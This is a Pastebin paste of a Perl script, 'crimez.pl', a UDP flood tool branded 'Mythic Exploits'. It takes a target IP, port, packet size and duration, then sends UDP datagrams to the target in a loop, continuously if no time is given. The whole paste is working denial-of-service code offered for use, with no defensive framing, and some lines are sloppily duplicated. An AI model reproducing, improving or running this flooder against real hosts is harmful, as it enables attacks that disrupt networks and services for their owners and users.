Advertisement
real_billy1234

Untitled

Sep 16th, 2019
2,208
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.04 KB | None | 0 0
  1. #!/usr/bin/perl
  2.  
  3. ##############
  4. # Decoding
  5. ##############
  6.  
  7. use Socket;
  8. use strict;
  9.  
  10. if ($#ARGV != 3) {
  11. print "crimez.pl <ip> <port> <size> <time>\n\n";
  12. print " port=0: use random ports\n";
  13. print " size=65500: use random size between 64 and 65500\n";
  14. print " time=0: continuous flood\n";
  15. exit(1);
  16. }
  17.  
  18. my ($ip,$port,$size,$time) = @ARGV;
  19.  
  20. my ($iaddr,$endtime,$psize,$pport);
  21.  
  22. $iaddr = inet_aton("$ip") or die "Cannot resolve hostname $ip\n";
  23. $endtime = time() + ($time ? $time : 1000000);
  24.  
  25. socket(flood, PF_INET, SOCK_DGRAM, 17);
  26.  
  27. print <<EOTEXT;
  28. Subscribe to Mythic Exploits!
  29. ----------------------------------------------------------------------------------------------------------------
  30. ████████ ████████ ██
  31. ██ ██ ██ ██
  32. ██ ██ ███████ ██
  33. ██ ██ ██ ██
  34. ███ ████ ███████ ████
  35. ██ ████
  36. ███████████████████████
  37. ██ ██ ██ ██ ██
  38. ██████████████████████████████████████
  39. ██████████████ ██████████████████████
  40. ██████████ ██████████████████
  41. ██████████ ██████████████████
  42. ██████████ ██████████████████
  43. ( ( ( ) ) ";
  44. " )\ ) )\ ) )\ ) * ) ( /( ( /( * ) ";
  45. " (()/( (()/((()/(\` ) /( )\()) )\()) ( \` ) /( ";
  46. " /(_)) /(_))/(_))( )(_))((_)\ ((_)\ )\ ( )(_)) ";
  47. " (_))_ (_)) (_)) (_(_()) _((_) _((_)((_) (_(_()) ";
  48. " | \|_ _|| _ \|_ _| |_ / | \| || __||_ _| ";
  49. " | |) || | | / | | / / | .\` || _| | | ";
  50. " |___/|___||_|_\ |_| /___| |_|\_||___| |_| ";
  51. " ";
  52. ----------------------------------------------------------------------------------------------------------------
  53. smxcked skid
  54. EOTEXT
  55. print "UDPPLAIN SLAMED $ip " . ($port ? $port : "random") . " port with " .
  56. ($size ? "$size-byte" : "random size") . " packets" .
  57. ($time ? " for $time seconds" : "") . "\n";
  58. ($size ? "$size-byte" : "random size") . " packets" .
  59. ($time ? " for $time seconds" : "") . "\n";
  60. ($size ? "$size-byte" : "random size") . " packets" .
  61. ($time ? " for $time seconds" : "") . "\n";
  62. print "Break with Ctrl-C\n" unless $time;
  63.  
  64. for (;time() <= $endtime;) {
  65. $psize = $size ? $size : int(rand(1024-64)+64) ;
  66. $pport = $port ? $port : int(rand(65500))+1;
  67. $psize = $size ? $size : int(rand(1024-64)+64) ;
  68. $pport = $port ? $port : int(rand(65500))+1;
  69.  
  70. send(flood,
  71. pack("a$psize","saf3e368wumu7repa4uxa2rucHaphubeGamu9R3373af8Us3eTHUgepRAfAS2c6CHAyegURepUbre94wRAwruS2uhU8UXasp7spasw7sw8h7wapr5spabekumu8ast8StRadusASacu6a6e5efrAzeWucH5cumuswaraca7hAbrewrecujetrafefadrawruW4ayAjU37sPUseBr4cRuPhacrUtrf0azrrQlLd1xdSjjtdwXfjyXArkExrVxVlulxssmr0u0lRscLAqjkZB43ajPRmAH4JQ6T1SOZPFmndbEi4IUOIuUmPCXI044f73uGIeJHs8lh36KpJausXqykL2idPx1j120Rra2DI1kmGgde5LI4TJMuQvrotBR3Fli0g1uwt74ALKfRzHYZJR0wkqNncUY178LcbTFtx5n7MF4zX3P4Z3mUVkAebkXqDv6EETKTNBes9kW2QBEBLeKcBH4cUAQ8Y30mdGozVRNJq3wtDMmgtzCibqXEEp3cZATTOMqIDxn3t5HYdspEofPneXpPTUE0TBN8oRAp4DjSlhfDAVmfNgbdSbTHWT7Y7gVi6kgrNXKCM64V4kOGvesVr0SZU3k83r6qAr3w4d26kurU9eBRa53cEtRaQaCHEvacu4PETRaf3yepHAk9FAgU2at8GEMEZAwUjaDesTufu2r3DaPhedR7quCru7reketc8atacAStuGeFruNuTHaWuspabr6drARa4r4cApRewuFRaD3qAXAsPeMAChudRUWxuq73R5dra8epre4tasp8craq677wru5asuq3tradede8rethuSwAfespastuduypUt2fudra5utanewrat83rucruyuje6aphuprUWawrawr4tha922HeSpU8acacu5hastuprecevasteberepagas6ejuje2heswugukerebrajeVeswerajAdagecah3phE9EsutaFrU6erathu2u6utraseCrEjehaChuphEchepeswutrezu86pret6afa"),
  72. 0, pack_sockaddr_in($pport, $iaddr));}
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement